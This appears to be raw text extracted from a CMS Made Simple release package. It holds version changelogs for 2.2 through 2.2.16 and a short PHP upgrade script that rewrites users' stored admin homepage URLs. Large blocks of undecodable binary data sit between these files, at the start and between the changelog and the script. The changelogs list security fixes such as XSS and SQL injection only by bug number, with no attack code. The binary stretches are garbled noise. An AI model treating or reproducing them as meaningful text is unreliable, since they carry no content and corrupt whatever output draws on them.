x�ɔ2,��c\��(�(u��H0�D�@}����b�w�<T�$%{'�~C�K��������[� H��x�2۠�
P�I��#�6y��׷�Y��j��
x��M�s)R�I��UM�:����/�k�c��g����I��N���A�l���-��
����e���|8����O�����P�3�*<fx>�Y�$��*�~��l� Ob������,��ӎ�J�s"{�C7�~d�#&g�-�Y���`�庋,�6�х��ǠF��/V��U��>��>S��F5��c<��� p��9��
�n^̸�b0��	�D!�1���}�`�<�9��J��C���@��oBΙN%����v<0V���";�<s�?$�:�~�'�
R(I���G��y����q��
Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.
  
FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content. 
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices;

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.
  
MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching 
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled�
�W�rG��+x��2���M+Q�#Ljä��Fuu5	y`1�����偘�`��둙u���/g�W'_�.�~�xu��É�啷?�?=��۷��v�˷�'�Ԝj7yz������?.��!/��M^�{϶��k1�2�+����/��}>���IJX�A{�9�f�ѹY�Lcv���7�T�g��ټ�_�˻���5���L��x�Z21��9[���o�e~��D��R�EI�l��19GZ72��,ng����-i���}Q��-4SL�y�~Qם�惬�L�tȔ���i�G��!RA�$\�"=�b=��Y�j�:���A�Pw0�� ˕�~�QU-��m�rU��Fʲ�J���.�C?�=�g���L�[)��
�kM��)�y�в�A���
�nM�ȡ��)H+n�ͪpvN�֢{�`�T�TĨxB��-Q!ڐa�[�Ý���\�:AE�.�[�q���V��{�ˌ����+�H�jU�!��Ϳ��r|�ӭă�c����%P�!��T�����C������|S}��*�E����\��TVf������;�~�z:�5�"�Ѱ�Q�b'��(����+�Ax��[bG�m��7�N�Z]h�X��)i�f7+��Q�����O�����U��Ec�(�L�YT
D-d�9Wu�WzX���ǐMq�"��X�[E���^&�Ԙ���}s7˛��w-�A/gkB
�B��6�/�Q��
z8�e����R~�n)���V�!(��B�KȺ9�qH���
]ͩ{d��~�\�^�ە��Jx8E��D�CD���\��c��# #A>��g_=\��ư���ɪ��դ��د\���d�J|H�K���7��0���&带���[uM�\��{w�D����b~PU!�*6�HRKʨ���[�ӭ�����Ti�)�-�LH
t�ltAR�>�F	?�G] F#�T�t�����\6�T�f!�lҶp���?�_~Z��8��]]�vw޸A��>?�&ki�p��+�V�59���>���2/�]i�r�F�n�o*l�ɱ���V[ұi�TȤ���g�g���N��9 �����(V���9�Ql*��7�'cv�!���3f]I%�$���	���%�6~Z`����	��!��1`ktDE6��
��V?ݶ��z�-���AκC��x�|�V	��J	)�BvD��y��v�3�s]l)e$.IYȻ)؀����{�<�g{y$:��!��N�f9k���>�-s���l%��#�?����p��|��n�{A�u$M���BΫ2p=I�=
��@F-N�[��C�!Eݥ�iXX0�����K�[tS����	`�G�Spe�{�>��u���x��׬#b�1{��:�	�\���>�Nl&ؾ��툮����lX�Hl(�a��x����^�������<�V�'�B�>".G`_v<���f�Ss����=jB���-b�vj}�9�x��@]���+��SG�0	e���r�"���w��f=\�@�M����x ޔcl�rE�I��5�Z����MJ�ޡ��0���x
�X�[�{wGҊ�(W��'�f��B�b�����xúd��#���ϫ� &���ٿH6F�aƇ;��:3�6JS�G��Xr��5z�I��L:ث6����0+� g
�]�d���Q���v1�V5�cb
�ɚ�1�d����sAl7��~X�o�܏^b�@4薄!�]�b
�9k}�`�C���Q텹=��p�2N�bD2p($�!��)�3Z+�C`q���<�g��Erۛ�ۨv3�ڂ�5%Zl��H.G�%�y��v�zx
�:���Q�1;�j�Yl��b~w�&�F�Vq�	�P�,�(�a�]ا-h	&A���
Fȉ�_UESȾ��p��a�늪��]h�^&��$צ�!�n�r�]O�P�s��:��)�#���j��b�OY^��~������Y4<?php

# Fix backend users' homepage url
# replace all previous secure params with [SECURITYTAG]
# remove the admin dir name from the url (url should be relative to admin dir)
$sql = 'SELECT user_id,value FROM '.CMS_DB_PREFIX.'userprefs WHERE preference = ?';
$homepages = $db->getAll($sql,['homepage'] );
if (is_array($homepages) && count($homepages))  {
    status_msg('Converting backend users\' homepage preference');

    $update_statement = 'UPDATE ' . CMS_DB_PREFIX . 'userprefs SET value = ? WHERE user_id = ? AND preference = ?';

    foreach ($homepages as $homepage) {

        
        $url = $homepage['value'];
        if (empty($url)) continue;
        
        // quick hacks to remove old secure param name from homepage url
        // and replace with the correct one.
        $url = str_replace('&amp;','&',$url);
        $tmp = explode('?',$url);
        @parse_str($tmp[1],$tmp2);
        if( in_array('_s_',array_keys($tmp2)) ) unset($tmp2['_s_']);
        if( in_array('sp_',array_keys($tmp2)) ) unset($tmp2['sp_']);
        
        $tmp2['_CMSKEY_'] = 'XXXX'; // current secure param
                
        foreach( $tmp2 as $k => $v ) {
            $tmp3[] = $k.'='.$v;
        }
        $url = $tmp[0].'?'.implode('&amp;',$tmp3);
        $url = str_replace('_CMSKEY_=XXXX','[SECURITYTAG]',$url);

        $url = preg_replace('@^/[^/]+/@','',$url); //remove admin folder from the url (if applicable)

        unset($tmp2,$tmp3);
        
        $db->execute($update_statement,[$url,$homepage['user_id'],'homepage']);
    }
}
Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging
  - BR #12437 - Installer won't allow "<" symbol in database password
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by
  - BR #12484 - Cannot exit after Run UDT
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix
  - BR #12499 - adminlog.tpl Wrongly formed date
  - BR #12500 - NameQuote function does not work properly
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor
  - Adjust regex's incompatible with PCRE2
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format
  - A number of fixes for PHP 8 compatibility

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search
  - Added 'Manage Search' permission;
  - BR #12391 - Core search issue page/entry titles that start with numbers;
  
Phar Installer v1.3.15  
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password; 
  - Added Russian lang file to installer;
  - use locale_ftime() instead of deprecated strftime();
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty;
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support;

Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices;

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
